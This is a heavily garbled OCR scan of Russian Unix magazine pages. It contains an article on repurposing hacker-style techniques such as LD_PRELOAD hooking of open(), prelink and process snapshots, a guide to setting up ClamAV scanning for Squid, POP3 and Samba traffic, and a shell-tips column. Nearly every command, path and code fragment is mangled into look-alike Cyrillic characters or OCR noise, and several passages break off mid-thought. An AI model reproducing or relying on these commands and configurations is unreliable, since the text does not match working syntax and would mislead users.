1.+^ Тппгііи.1 гіиі’іс#- днжлгп Гіі Ми ІЭЬ 4 
=-іѵн'1 -Г4ЛМІ4 іМШйк 
5№е 4 іапьоі е ^ 1 1 и 1 1 1:. 
іаі/сР =йп»1о сМипк 

эагогігч е*п сМгжтаг Лѵісе Лгк/Н«27«/І 
эйгиМп? ойп еЬагдскг *іѵ1е* /епіі/24й227Г4/4 
[+■] Ргэсеьь Іх- □гкіыЫу'Іп іукаі 1 . иштіітд □НІИ.. 

НИР ПЧІІЗ^-- ѴнГС та Рв й: М&ебМВ- ОГГ-ЙС - ЙИР47Э5 

сопмчзйй 7эв*и ъу&і іпга извге Ьутаі. да* сярге азідатО 

ЬИНхп 1иі]Е . 



> Создание снимка программы при помощи сгуорісі 



нее популярные инструменты, особенно 
при возникновении стандартной ошибки 
«беѵісе із Ьизу» во время демонтирования 
файловой системы насъемном носителе. 
Практика использования хакерского фун- 
кционала операционной системы в мирных 
целях не ограничивается одним лишь на- 
бором стандартных программ. С приходом 
в ІЛМІХ формата исполняемых файлов ЕІ_Р 
появилась возможность подмены экспор- 
тируемых функций любой загружаемой 
библиотеки. Механизм называется ргеіоаб. 
Он базируется на свойстве динамического 
линковщика ЕІ_Р-файлов, который выпол- 
няет такую процедуру, как зутбоі Іоокир 
(поиск в объектном файле экспортируемых 
символов, в том числе функций), на этапе 
загрузки библиотеки в память (во времена 
господства отжившего свое формата а. оиі 
эта процедура выполнялась наэтапе компо- 
новки объектного файла). Прием считается 
вполне легальным и полностью документи- 
рован в тап-странице І<± зо (8). Кроме того, 
его достаточно просто реализовать: 



Пример перехвата функции ореп (2)^^ ■■■ 

ГЖомпиляция^с^^Ііаге^РІ^^і^^Ші^^ЧЦМсІ 
* запуск: $ І_Р_РРЕІ_ОАР=./ІІЬ. 50 ргодгат 




#іпсІисІѳ <сНТсп . И>Д^ 
#іпсІиЦ^^узДуре^^ 
#іпсІисІе <5іНіаТі>^Р5 



І^Указэтвл^^ри™нальну|^функци^/^^^^^^Щ 

Із^аЦсіп^(*огід^ореп)(сопз^сІпаг*Пп^ппо^^^ОІ^^^^^^Д 

| Г Фиктивная функция */| . - ^ - ‘ 

|іп1 ореп (соп5І сііаг *раІІіпате, іпі Лада, тос!е_1 тосіе) {| 




і^Получи^дре^ритнально^функци^Ѵ^^^^^^В 

/Теперь можно делать все, что угодно, в це.лч/Д^^Р 
демонстрации просто напечатаем сообщение ѵИРмиі 

-"5 ^ * \&*\ 

Г Вызываем оригинальную функцию и возвращаемся| 



г 



|ге!_ѵаІ = огід_ореп (раіітпате, Ладо, тос!е);| 



О 

Легкость, с которой в ІЛМІХ можно об- 
манывать программы, подсовывая им 
фиктивные точки входа в библиотеку, 
привела к большому распространению 
этого приема в легальном программном 
обеспечении. Особенно он популярен в 
программах, трассирующих процесс ус- 
тановки других программ. Всем известная 
и очень популярная утилита сбескіпзіаІІ 
( сіпескіпзіаіі.ігіо.огд ) перехватывает стан- 
дартныебиблиотечныефункциисгеаі(),ореп 
(),іореп()инекоторыедругиѳдляформирова- 
нияспискавновьсозданныхфайловипосле- 
дующего создания дистрибутивного пакета 
(РРМ, сІеЬ или ркд). 



Библиотека ІіЬдІІрз ( ѵѵѵѵѵѵ.бакоіасот. 
пеі/~бопиІ/ргодгатз/ІіЬдІІрз. ИІтП перехва- 
тывает функцию обновления экрана биб- 
лиотеки ОрепОІ_ для помещения на экран 
счетчика числа кадров в секунду. Библиоте- 
ка ІіЬеІс ( огсШис.пеі/Із/ІіЬеісЛ обрабатывает 
почти все функции стандартной библиотеки 
(ІіЬс), связанные с доступом к файлам, для 
модификации путей вида «/Ііоте/изег/. ТМе» 
в «/Иоте/изег/. сопЛдЛіІе», позволяя помес- 
тить все личные конфигурационные файлы 
в выделенный каталог. 

Решение о замене формата исполняемых 
файлов с а.оіФ на ЕІ_Р принесло наряду с 
очевидными преимуществами столь же оче- 
видные недостатки. Главным достоинством 
формата ЕІ_Р является его гибкость и дина- 
мическая сущность. В случае с ЕІ_Р такие 
процедуры, как зутбоі Іоокир и геіосаііоп 
(модификация адресов библиотеки при 
размещении ее в памяти), производятся во 
время загрузки программы и библиотек. 
Динамическому линковщику приходится 
выполнять гораздо больше работы, нежели 
в случае с форматом а.оиі, для которого эти 
действия выполняются во время компонов- 
ки. Как следствие, скорость запуска про- 
граммы падает в разы. Но выход из этой си- 
туации есть: необходимо модифицировать 
заголовок ЕБР-файла таким образом, чтобы 
придать ему черты формата а.оиі, то есть 
заблаговременно выполнить зутбоі Іоокир 
и геіосаііоп. Причем сделать это не во время 
компоновки, авотношенииуже готовыхи ра- 
ботающих ЕБР-файлов, как это делают виру- 
сы. Программа ргеііпк, выполняющая эту за- 
дачу, была реализована компанией Реб Наі. 
Но так как при обновлении библиотек моди- 
фикацию программы придется повторить, 
область ее применения ограничивается сис- 
темами, в которых регулярные обновления 
не являются приоритетной задачей. 

Годами хакеры снимали дамп памяти про- 
цессов для изучения внутренней структу- 
ры программы в момент ее исполнения. В 
ІІІМІХ снятие дампов тоже практиковалось, 
но в несколько иных целях, и не хакера- 
ми, а ядром операционной системы. Это 
пресловутые соге-файлы, генерируемые 
ядром, чтобы позволить разработчику 
отлаживать программу. Исследование и 
отладка — вполне очевидный повод для 
снятия дампа. Другое дело — запись дам- 
па для последующего возобновления ра- 
боты программы с того же места. Именно 
с этой целью писалась программа СгуоРЮ 
( сгуоріб.бегііоз.бе ). Ее назначение — замо- 
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> Фрагмент одного из плаке-файлов системы 
портов РгееВЗО 



ханизм іпоШу, появившийся 
в ядре І_іпих версии 2.6.14 и 
являющийся трассировщиком 
изменений файловой системы, 
благополучно используется ло- 
кальным поисковиком Ьеадіе 
( Ьеааіе-ргоіесі.ога ). Или леген- 
дарный пеісаі, уж не знаю, для 
каких целей он был создан, но 
область его применения прос- 
то огромна: от отладки сетевых 
протоколов и тестирования 
серверов до перекачки файлов 



розить «долгоиграющий» процесс и запи- 
сать его «снимок» на диск. Затем «снимок», 
представляющий собой самораспаковы- 
вающийся архив, можно запустить и про- 
должить работу с программой. 

О Выводы 

Конечно же, есть и другие примеры ис- 
пользования богатого хакерского функ- 
ционала в мирных целях. Например, ме- 



и организации удаленного до- 
ступа к машине. А чего стоят бронебойные 
комбинации АІі+ЗузРд+..., действующие 
прямо на ядро І_іпих, ведь они тоже были 
введены в помощь разработчикам ядра. 
Легко заметить, насколько универсальна 
ІЛЧІХ. Сколько идей и приемов было пере- 
нято из одной области ее применения в дру- 
гую. Как здраво мыслили ее создатели, не 
делая границ между пользователями и раз- 
работчиками операционной системы. □С 



Подмен а системных вызовов 



Во времена І_іпих-ядер подмена системных 
вызовов путем загрузки специального мо- 
дуля ядра была вполне легальной и легко 
реализуемой операцией. Но с переходом 
на ветку 2.6 все изменилось. Опасаясь 
за безопасность операционной системы, 
разработчики сделали системные вызовы 
неэкспортируемыми, и теперь для их пере- 
хвата приходится использовать гораздо 
более изощренные приемы. 

С о з д -а т <?.■■■. и О реп О Т Тіо о 
надеются н-а ргеііпк 

Разработчики популярного офисного па- 
кета ОрепОіІісе подверглись серьезной 
критике, после того как опубликовали но- 
вость о том, что для решения проблемы 
слишком долгого запуска программы вме- 
сто оптимизации кода они будут использо- 
вать ргеііпк. Кстати, собственные реализа- 
ции ргеііпк есть также в Ігіх (ОІІІСКЗТАВТ) и 
Зоіагіз(сгіе). 
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ПРОЗРАЧНЫЙ 




КАКИМ ОБРАЗОМ СЕТЕВЫЕ ВИРУСЫ ПОПАДАЮТ НА РАБОЧИЕ СТАНЦИИ ЛОКАЛЬНОЙ СЕТИ? КАК ПРАВИЛО, СУЩЕСТВУЕТ 
ТРИ СПОСОБА: ЧЕРЕЗ «СЕТЕВОЕ ОКРУЖЕНИЕ», ПО Е-МАІБ И В РЕЗУЛЬТАТЕ НЕОСТОРОЖНОГО ѴѴЕВ-СЕРФИНГА. В ЭТОЙ 
СТАТЬЕ МЫ ПОГОВОРИМ ОБ ОРГАНИЗАЦИИ АНТИВИРУСНОЙ ПРОВЕРКИ ПОЧТЫ И ЗАГРУЖАЕМЫХ ЧЕРЕЗ ЗАМВА ФАЙЛОВ, 
А ТАКЖЕ ПОСТАРАЕМСЯ ЗАЩИТИТЬ ПОЛЬЗОВАТЕЛЕЙ НАШЕЙ СЕТИ, КАЧАЮЩИХ ВСЕ ПОДРЯД. 



ля начала выясним, как бу- 
дет осуществляться проверка 
ѴѴѴѴѴѴ-трафика. На твоем шлю- 
зе должен быть установлен ЗдиісІ. С по- 
мощью специальных средств мы будем 
передавать каждый полученный прокси- 
сервером файл на проверку антивирусу. 
В качестве антивируса мы будем исполь- 
зовать СІатАѴ ( сІатаѵ.пеО . Я специально 
не назвал имя программы. Дело в том, что 
настроить связку ЗдиісІ + СІатАѴ можно не- 
сколькими способами. Один из них подра- 
зумевает использование протокола ЮАР 
( \л/\л/\л/.1-сар.ога Г Другой способ основан на 
использовании редиректоров ЗдиісІ, ко- 
торые позволяют передавать полученные 
файлы антивирусу «напрямую», без учас- 
тия какой-либо вспомогательной програм- 
мы. Третий способ заключается в исполь- 
зовании скрипта Ѵігаіаіог. 

Сразу нужно отметить, что второй способ 
не очень надежен, поскольку редиректоры 
могутне срабатывать при большой нагруз- 
ке на прокси. К тому же возможности ре- 
директоров ограничены, а использование 
внешних программ позволяет организо- 
вать антивирусную проверку более гибко. 
Остается ЮАР или Ѵігаіаіог. Я настраивал 
оба варианта на разных машинах. Пока 
все работает стабильно. Но настройка с 



использованием ѴігаІаФг проще, поэтому 
мы рассмотрим именно этот вариант. Если 
кого-то ѴігаІаФг не устраивает, то в конце 
статьи я приведу ссылки на материалы, где 
описана настройка связки ЗдиісІ + СІатАѴ 
через ЮАР. 

Нам понадобится следующий софт: 

• здиісІ-2.5.3ТАВІ_Е10 

• здиісЮиагсІ-1.2.0 

• арасбе-2.0.54 

• ѵігаІаіог-0.9.7 

• сІатаѵ-0.88.1 

ЗдиісІ и АрасИе есть в составе любого дист- 
ра, Ѵігаіаіог можно скачать насайте ѵігаіаіог. 
зГпеГ РРМ-пакет с СІатАѴ для любого рас- 
пространенного дистра (ОеЬіап, Мапбгіѵа, 
Ребога Соге и др.) доступен по адресу: 
сІатаѵ.пеІ/Ьіпагу.ІіітІ . 

Назначение первых пакетов всем извест- 
но. С последним тоже все понятно. Погово- 
рим о четвертом. Скрипт Ѵігаіаіог передает 
запросы от ЗдиісЮиагсІ, который работает 
в паре со ЗдиісІ, антивирусу СІатАѴ. Спра- 
шивается, а зачем тогда нам АрасИе? 
Именно через Арасбе мы будем запускать 
ѴігаІаФг. 

После небольшой теоретической части при- 
ступаем к настройке (подразумевается, что 
ЗдиісІ и ЗдиісЮиагсІ у тебя уже установлены). 
Сначала отредактируй здиісІ. сопР 




# адрес и по 



Т ДЛЯ 

огП 92.168. 0.1:3128 

# задаем 1 Г б кэша, 1 6 каталогов первого уровня и 256 

№1111 

сасІтеЩігиІе/ѵаг/зрооІ/здиісІ 1024 16 256 

# определяем списки контроля доступом 
асі ту_пеІзгс 192.168.0.0/24 
Гііір_ассе53 аііоѵѵ ту_пе! 

Нір_ассеззсІепуаІІ 

# указываем имя пользователя, с правами которого 
сасГіе_е1 : 1 : ес1іѵе_изег здиісІ 



Теперь создаем файл ЗдиісЮиагсІ. сопГ 

сІЫіоте /изг/зГіаге/здиісІОиагсІ-1 ,2.0/сІЬ 
Іодсііг /ѵаг/Іод/здиісІОиагсІ 
сіезі ЯІез { 

ехргеззіопіізі ітр/ІІІез 

I 



разз ШІезаІІ 
гебігесі 

Иір://192.168.0.1/сді-Ьіп/ѵігаІаіог.сді?игІ=%и 



I 
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АНТИВИРУС 




Не сложно догадаться, что означает содер- 
жимое данного конфига: здиісЮиагсІ пере- 
дает все принятые файлы скрипту Ѵігаіаіог, 
размещенному на нашем ѴѴеЬ-сервере. 
В /изг/зЬаге/здиісЮиагсМ .2.0/сІЬ создай 
каталог ітр, а в нем — файл ЛІез такого 
содержания: 



# ѵі /изг/зИаге/зяиісІСиагсІ-1 .2.0/сІЬ/Ітр/ііІ 

(\.ехе$І\.ЬаІ$І\. 2 ір$І\.Ьіп$І\.гед$І\.зуз$І\.гаг$І\.ѵѵтѵ$І\. 
$І\.тред$\.аѵі$) 



Данная строка задает, какие файлы нужно 
проверять. 

После этого возвращаемся к конфигуздиісі. 
сопі и добавляем в него следующие строки: 



гесІігесІог_Ьуразз оп 

гесі і гес Щр год гат /изг/Іо саІ/здиісЮиагсІ/Ы п/зд и і сКЗ иагсі 

# и сколько копий здиісЮиагсІ нужно запускать 
гесІігесЩсГііІсІгеп 10 

гесІігесіог_ассезз сіепу ІосаІГіозі 
гесНгесіог_ассезз сіепу ЗЗІ__рогіз 

Все, со ЗдиісІ и ЗдиісЮиагсІ у нас полный 
порядок. Приступим к конфигурированию 
АрасЬе. Отредактируй НПрсІ.сопТ следую- 
щим образом: 

# внутренний ІР-адрес нашего сервера 
ЗегѵегІЧате 192.168.0.1 



#зегѵісе Гііірсі зіагі 

Теперь распаковываем архив с Ѵігаіаіог: 

# Іаг хіѵг ѵігаІа1ог-0.9.7.1аг.д2 

В каталог /ѵаг/ѵѵѵѵѵѵ/сді-Ьіп нужно скопиро- 
вать файл ѵігаіаіог.сді и изменить владель- 
ца на арасЬе (от имени этого пользователя 
у меня работает АрасЬе): 

# ср ѵігаіаіог.сді /ѵаг/ѵѵѵѵѵѵ/сді-Ьіп 

# сЬоѵѵп арасГіе:арасІіе /ѵаг/ѵѵѵѵѵѵ/сді-Ьіп/ѵігаіаІог.сді 

Ѵігаіаіог требует дополнительные РегІ-моду- 
ли, они устанавливаются командой: 



# указываем абсолютный путь до здиісЮиагсІ 



Осталось только запустить АрасЬе: 



> Установка пакетов антивируса СІатАѴ 



[ і им ! Ініік. нм | ірім -діі-н * 

гііьлѵпрпі-^і.ціімна і с -6_ЁБ . А- 6_ 1_ ЗййьСгоик . ІЕ-Нь_ грь'і! Хз гс.-л і-ъък ѴЗ СЕЛ ьіцм аіигс ^ 



гшкеѵ , коу ій се 

Г :х:гчт : іі а. . . . 

1;1іЬс1_ппш1 

2;гІти а -гіЬ 

/І! ПІ іПАі 1 

А:с1мк\ 

5:сІлнѵ-п1І.ійг 
Г гпп'К^эзЛЕій^ ■: і.йгяу 1-Д | 



иПЗХЖХшДОЗлХОСССыПЗлІ'ХСДЛТХССССииП'лХШОЗХ [ — гГЧ | 

ФшяміФ ШѴёШі+мтмынн ш м** [ ь&ъ; 

ДЛЛ-Ѵ УГЛ ДІДД ІМДЛЛЛД УГ ДДДІДДІМДЛЛЛД У І Г ДДДІД I ІЕГІІ 
^ЛЛД У І ДДДД ДДД д Ѵ ДДЛЛДк Ч ДДДД ДДДд Ѵ ДДЛЛД Ѵ І ДДДДД I 1ЭЭ-Ч ! 



# регі -МСРАЫ -е зЬеіі 



Будет задан ряд вопросов, на которые мож- 
но ответить нажатием <Епіег>, а вот когда 
появится приглашение «срап>», набираем: 



После установки модуля перейди в каталог 
с распакованным Ѵігаіаіог'ом. Здесь будет 
подкаталог еіс/ѵігаіаіог, который нужно ско- 
пировать в /еіс. Отредактируй ѵігаіаіог.сопі 
следующим образом: 
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СІатАѴ — некоммер- 
ческий антивирус. Не 
всегда разработчики 
антивирусных баз 
поспевают за разработ- 
чиками вирусов. Мак- 
симум, что ты можешь 
сделать в случае, если 
твоя сеть все-таки будет 
инфицирована, — это 
сообщить разработчи- 
кам о новом вирусе, на 
который антивирус не 



| -ѵіпіііѵ.і I ііч г' м№'|: ТчнЬсІл- 

Сіш-Х,' иі:аЫ ;геечлі і1я-М іЬ Ті: И- 1= : 2 Ь : НК 

іЧѵ-к-ііГіѴ.І •,% ■ . і - ч'іі |-| 

нт.': л: л=а-ай іѵпіл - : 44, та-] в: I 4] ] [■.. 1 ■ ІлѵъІ.: ], Ьлмвг: : ►хц ■ I 
ічѵ^іімѴіі - ін в:-- ■ ■ г'/іі :-| 

4вИѵ.сѵ1 і:к:к і^вілп: 171?, вІ.[в 1 -іѵ;іі: 3, -Л'.іѣг : ееог4п I 

ГыІ^і.і.1 ■ і іі - ІірьіІ іі іи ,1, ■ 3 ь г і ■ і І.к.іи і . |-Р !•'«. ТТГ Л щ ТЧ| 

[№№: С1в~с ѵвв ШТ гпИМші: Сві'Ь :еігк: Іа е1_вг4 Мгз.і;і .'ъшгУМінІжтіг'еІ 
■м І.ШшѴЛ 

■ЮТгккГ: 'іі ввеЬ ІПі й~ -ЛгвсЬзгр 
I Іі.-і'.зз:- к .ішніё кѴя*Л 
| -4йЧ*1ЕІЛваЕ Е Ш 1 .' I . | 

> Обновление успешно завершено, но я забыл запустить сіатсі, 
поэтому {гезНсІаіл «выругался» 




>Настройка ІЕ 



# ѵі /еіс/ѵігаіаіог/ѵігаіаіог.сопі Перед выполнением ФезНсІат можно запустить демон 

#ІР-адрес сервера, на котором будет работать ѵігаіаіог сіатсі: 

зегѵегпате -> 192.168.0.1 

#Тип антивируса. Кроме СІатАѴ, скрипт может работать с АѴР и дру| # сіатсі 



гими антивирусами 
апЛѵігиз -> СІ_АМАѴ 

# Имя сканера 
ѵігиззсаппег -> сіатзсап 

# Путь к сканеру 
зсаппеграіИ -> /изг/Ып 

# Команда (удалить) 
ѵігизстсі -> --гетоѵе 

# Сообщение антивируса о том, что найден вирус 

Ш8-> Ш8И 

боѵѵпіоасіз -> /ѵаг/ѵѵѵѵѵѵ/біті/боѵѵпіоабз 
боѵѵпІоасЫіг -> /боѵѵпіоасіз 

# Язык (русского нет — можно даже не проверять) 




Тогда программа ІгезИсІат автоматически сообщит 
демону об обновленных базах. Также рекомендую без 
промедления выполнить проверку файловой системы 
шлюза: 

#сІатаѵ-г/ 

Теперь осталось на клиентских машинах указать ис- 
пользование прокси-сервера 192.168.0.1 (порт 3128). 
На этом настройку можно считать завершенной. Один 
путь попадания вирусов в нашу сеть мы уже отрезали. 
Хотя, если быть предельно точным, не отрезали, а зна- 
чительно сузили. 



реагирует... 



ШілЧлІ 



сікѵѵз.огд.иа/іпсіех. 
рНр?раде=зІіоѵѵ&1ІІе=а/ 
зегѵегз/каѵ — инте- 
грация Антивируса 
Касперского с почтовой 
системой 




# Пароль для закрытых зон 
зесгеі -> зесгеіраззѵѵсі 

# Полезные опции 
зсаппегзиттагу -> ігие 
рориріазі -> іа ізе 

рорирѵѵісШп -> 600 
рорирбеідіпі -> 400 
ШесбтосІ -> 644 

РРЮОНЕ55 -> ргодг езз.рпд 

Не забудь создать подкаталог сіоѵѵпіоасіз: 

# тксііг /ѵаг/ѵѵѵѵѵѵ/біті/боѵѵпіоасіз 

#сііоѵѵп арасИе:арасІіе/ѵаг/ѵѵѵѵѵѵ/Іі1тІ/боѵѵпІоабз 

Пришло время настроить СІатАѴ. Хотя тут и настраи- 
вать нечего. Просто установи пакеты сіатаѵ, сІатаѵ-сІЬ, 
сіатсі и ІіЬсІатаѵ. 

Первый пакет содержит сканер, второй — базы дан- 
ных, третий — демон СІатАѴ, а четвертый — биб- 
лиотеку, необходимую антивирусу. После установки 
нужно обновить антивирусные базы. Делается это 
командой: 



□ Проверка почты 

Для проверки «удаленных» почтовых ящиков (ска- 
жем, на таіі.ги или ѵапсіех.ги ) предлагаю исполь- 
зовать программу РЗЗсап в паре с СІатАѴ. Данный 
способ позволяет проверить все РОРЗ-соедине- 
ния, вне зависимости от того, к какому РОРЗ-сер- 
веру подключаются наши клиенты. С СІатАѴ мы уже 
знакомы, поэтому особо останавливаться на нем не 
будем, лучше поговорим о РЗЗсап, скачать который 
можно по адресу: зоигсеіогае.пеі/ргоіесіз/рЗзсап/ . 
Работает он так: 

• Клиент пытается соединиться с удаленным РОРЗ- 
сервером. 

• іріаЫез перенаправляет пакеты на локальный порт, 
который прослушивает демон рЗзсап. 

•Демон читает адрес получателя пакета (это адрестого 
самого РОРЗ-сервера) и соединяется с РОРЗ-серве- 
ром, запущенным наузле получателя. 

•Демон получает почту судаленного сервера, проверяет 
ее на наличие вирусов, спама и т.д. 
•Неинфицированная почта отправляется клиенту. 
Для установки рЗзсап распакуй архив в каталог/изг/згс 
и выполни команды: 




# таке іпзіаіі 
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> Настройка Оперы 
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> Антивирусная база заняла 5 Мб — довольно прилично 
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□ 31-ДОТЪ 



После этого следует отредактировать кон- 
фигурационный файл /еіс/рЗзсап/рЗзсап. 
сопЕ В большинстве случаев устроят зна- 
чения по умолчанию: нужно только их рас- 
комментировать. Для подключения СІатАѴ 
используй следующие параметры (при не- 
обходимости измени путь к исполняемому 
файлу сіатсізсап): 




зсаппег = /изг/Ьіп/сІатсІзсап -по-зиттагу -і 

После этого для перенаправления РОРЗ- 
трафика на локальный порт 8110 добавь 
дополнительное правило в набор рулесе- 
тов іріаЫез: 

# іріаЫез -1 паі -А РРЕРОІЛІІХЮ -р іср --сірогі 1 1 0\ 

-\ НЕОІНЕСТ —Іо 8110 

О ЗатЬа + СІатАѴ 

СІатАѴ можно использовать и для провер- 
ки ЗатЬа-трафика. Но настройка будет 
несколько сложнее, чем в первых двух слу- 
чаях. Прежде всего нам понадобятся ис- 
ходники ЗатЬа, а именно затЬа-З.О.ІО.іаг. 
Ът.2 и затЬа-ѵзсап-0.3.6Ь.1аг.Ь22 (во всяком 
случае, я использовал именно эти файлы). 
Оба архива нужно распаковать в каталог 
/изг/згс. Затем скопируй каталог с исходни- 
ками затЬа-ѵзсап в каталог/изг/згс/затЬа- 

3.0.10/ехатрІез/ѴРЗ. После этого перейди 
в каталог /изг/згс/затЬа-З.О.Ю/зоигсе и 
введи следующие команды: 




Теперь перейди в каталог /изг/згс/затЬа- 

3.0. 1 0/ехатрІез/ѴРЗ/затЬа-ѵзсап-О.З.бЬ и 
выполни команды: 

#таке 

Если все будет в порядке, то через неко- 
торое время получишь готовый модуль 
ЗатЬа ѴРЗ (ѵзсап-сіатаѵ.зо) для СІатАѴ. 
Не забудь скопировать его в каталог /изг/ 
ІіЬ/заптЬаМз. Права доступа к этому файлу 
нужно установить так: 

#сіпоѵѵп гооі:гооі ѵзсап-сіатаѵ.зо 

# сіптосі 0755 ѵзсап-сіатаѵ.зо 

Ленивым советую набрать команду «таке 
іпзіаіі»: она выполнит те же действия, то 
есть скопирует файл в требуемый каталог 
и соответствующим образом изменит пра- 
ва доступа. 

Теперь скопируем файл /изг/згс/заптЬа- 

3.0. Ю/ехатрІез/ѴРЗ/затЬа-ѵзсап-О.З.бЬ/ 
сіатаѵ/ѵзсап-сіатаѵ.сопі в каталог /еіс/ 
загтпЬа. Права доступа нужно установить так: 

# сбоѵѵп гооі: гооі /еіс/затЬа/ѵзсап-сІатаѵ.соЫ 

# сГітосІ 0644 /еІс/затЬа/ѵзсап-сІатаѵ.соИ 

Осталось отредактировать конфигурацион- 
ныефайлы. НачнемсзтЬ.сопЕ Принципсле- 
дующий: ты можешь указать объекты, для ко- 
торых нужно включать проверку. Например, 
включим проверку для объекта риЫіс: 

# ѵі /еІс/затЬа/зтЬ.сопі 

[риЫіс] 

соттепі = РиЫіс Лез 
раЛі = /ехрогі/риЫіс 



ѵ!з оЬіесі = ѵзсап-сіатаѵ 

ѵзсап-сіатаѵ: сопДд-ДІе = /еіс/затЬа/ѵзсап-сІатаѵ.соЫ 
ѵѵгііеаЫе = ■ 

ЬгоѵѵзеаЫе = уез 
геасі-опіу = по 
иЫіс = 
иезіок = 



Вѵзсап-сІатаѵ.соп{оставьвсекакесть(при 
необходимости отредактируешь его позд- 
нее), измени лишь следующую директиву: 

# ѵі /еІс/затЬа/ѵзсап-сІатаѵ.соп! 

сіатсі зоскеі пате = Дтр/сІатсІ 

После этого нужно запустить ЗатЬа: 

#зегѵісе затЬа зіагі 

Поздравляю, миссия выполнена! Единс- 
твенный неприятный момент: все, что мы 
защитили, будет работать медленнее, чем 
до защиты. Особенно тормозить будет 
ЗатЬа. Но ведь нужно чем-то жертвовать, 
вот мы и пожертвовали скоростью ради бе- 
зопасности. 



О Обновление СІатАѴ 

Какой бы антивирус ты ни выбрал (КАѴ, 
Ог.ѴѴеЬ, СІатАѴ), помни: он эффективно 
выполняетсвои функции, если ты регуляр- 
но обновляешь его базу данных. Вот так с 
помощью программы ігезітсіат антивирус- 
ная база СІатАѴ будет обновляться каж- 
дый день в 9 утра: 

#сгопіаЬ -е 

0 9 * * * /изг/Ьіп/ЛезГісІат > /сіеѵ/пиіі 2>&1 
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^ ипіхоісі 




ЕВГЕНИЙ «ЛМ» ЗОБНИН 

/ Л М@Ы5Т.ПІІ / 




ПРИВЕТСТВУЮ ТЕБЯ, ДОБЛЕСТНЫЙ ЮНИКСОИД. ПРЕДСТАВЛЯЮ ТВОЕМУ ВНИМАНИЮ ОЧЕРЕДНУЮ ПОДБОРКУ РАЗЛИЧНЫХ 
ТРЮКОВ, РЕКОМЕНДАЦИЙ И СОВЕТОВ, КАСАЮЩИХСЯ *І\ІІХ-СИСТЕМ. СЕГОДНЯ ТЫ УЗНАЕШЬ, КАК СДЕЛАТЬ ВНЕШНИЙ ОБЛИК 
|ХТЕВМ БОЛЕЕ ПРИЯТНЫМ ДЛЯ ГЛАЗ, УПРОСТИТЬ СВОЮ ЖИЗНЬ В КОНСОЛИ, СОЗДАТЬ И ПРИМОНТИРОВАТЬ ОБРАЗ КОМПАКТ- 
ДИСКА, ОБРАБОТАТЬ ТЕКСТОВУЮ ИНФОРМАЦИЮ, АТАКЖЕ РЕШИТЬ ПРОБЛЕМЫ СБОЯ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ. 



X -ѴѴіпсІоѵѵ 

■ Генерация тосіеііпе: 



і «Ленивые» псевдонимы 2 зИ (чтобы набирать 
‘./ргодгапп.ехе» вместо «ѵѵіпе ргодгаіл.ехе»): 



1024 768100 



аііа з -5 ех е='ѵѵіпе' 
аііа з -з іаг Щаѵ а чац§ 



■ Смена разрешения экрана из командной 
строки (доступные режимы и их номера мож- 
но узнать, запустив команду без флагов): 

[$ хгапсіг -5 <номер режима> 



■ Заливка фона цветом: 

$ хзеігооі -зоіісі \#434176 



■ Изменение размера шрифта в гхѵГ 
ЗЬИ Ѵ+', 5 144-'-' 

■ Изменение цвета текста и фонавхіегт/гхѵі: 
(нужно добавить эти строки в -/.ХсІеІаиІІз): 
ХТегт*Ьаскдгоип<± #434^76 

ХТегт4огедгоип<± #ЬЗссе6 

Командные интерпретаторы 

■ Представление вывода команды /Ып/рз в 
более удобном для чтения виде: 

аііаз рзсІ='рз ах -о изег,рісІ,4у,%сри,%тет,5ІаІДіте,сО: 
ттапсГ 

■ Защита от неос торожного удаления файла: 

Даііаз гт -'гт щД 

■ Назначение редактора по умолчанию (для 
команд ѵірѵѵ, ѵідг, ѵізибо и т.д.): 



■ Автокоррекция команды в 2 зИ: 

[зеіорі соггесіД 

■ Продвинутое автодополнение в 2 зб (авто- 
дополнение флагов, имен хостов и т.д.): 





аііаз -д Т='І ІаіГ 
аііаз -д 0='1дгер' 
аііаз -д І_='І Іезз' 
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■ Удобное приглашение для ЬазГ: 

ѲРЕЕМ='\[\033[0;32;40т\]" 

МОРМАЕ="\[\033[0т\]" 

ехрогі Р31 ="-($СОЕОН\и@\И$МОНМАЕ)-($СОЕОН \ 
ѵѵ$МОВМАЕ)-\п-($СОЕОВ\і:\$?$МОВМАІ_)-> " 

■ Удобный промпт для 2 зИ: 

ОРЕЕМ='\[\033[0;32;40т\] и 

МОВМАЕ='\[\033[0т\]'І 

ехрогі Р31 =Ч = %ГесІпо $СОЕОР'%}%п@%т%{'есІпо 
$МОРМАШ%Ц-(%{ЩсЬо$СОЕОР^% }%~% {ЩсЬо 
$ N О В М А^ %]Н%{ Щс До $СО ЬО Р ' % }%] : 



фесЬо $1\ЮВМА14%})->"| 



■ Подсветка результатов поиска дгер (жел- 
тым цветом): 

ехрогіОРЕР_ОРТІОМЗ= , -соІог=аиіо , [ 
ехрогі ОВЕР_СОІ_ОВ='1 ;33' 

■ Глобальные псевдонимы гзб (позволя- 
ют набирать «саі Іііе Ь> вместо «са\ Ті Іе I 
Іезз»): 

аііаз -д Н='І НеасІ' 



■ Информативный заголовок для хіегт 
(пользователь@хост <процесс> каталог): 
[сазе ЗТЕВШпД 
I *хіегт*1гхѵ1:) 

ргестсі () { ргіпі -Рп "\033]0;%п@%т %~\007" } 
ргеехес () { ргіпі-Рп "\033]0;%п@%т <$1 > %~ \007" } 

□1 



Носители информации 

■ Извлечение образа компакт-диска: 

$ сісі і!=/сІеѵ/ссІгот оі=ссі.ізо сопѵ=поеггог,поігипс 

■ Монтирование образа компакт-диска. 
І_іпих: 

#тои пІ 4 Ізо9660 -о Іоор ссі.ізо /тпі/ссігот 
РгееВЗБ (>= 5.0): 

# тсІсопИд -а 4 ѵпосіе 4 ссі.ізо тсІО 
|# тоипі 4 ССІ9660 /сІеѵ/тсІО /ссігот 



■ Создание образа компакт-диска: 

$ ткізоіз -ізо-іеѵеі 3 -Р ДсЬагзе!: коі8-г -о ссі.ізо 

Обработка текста 

■ Перекодирование текста: 

$ ісопѵ 4 срі 251 4 коі8-г -с йіе.іхі > ^ІІе_коі8г.1:х1 

■ Конвертирование НТМБвтекст: 

$ Іупх -сіитріііе.иіітіі > ДіІеДхІ 

■ Заменить строку: 

$ зесі 'з/регулярное_выражение/на_что_заменять/' 

Дііеі .1x1: > Дііе2.1:х1: 

■ Удалить строку (вместо номера можно ис- 
пользовать регулярное выражение, заклю- 
ченное взнаки/): 

$ зесі 'номер_строки сГ Дііеі .1x1 > Л1е2.М 



Видео и аудио 

■ Проигрывание Аибіо ОБ: 

$ тріауег -ссісіа зреесІ=1 ссІсІа://1 -1 8 

■ Кодирование Аисііо ОБ в формат Одд 
ѴогЫз: 

$сфагапоіа-В 
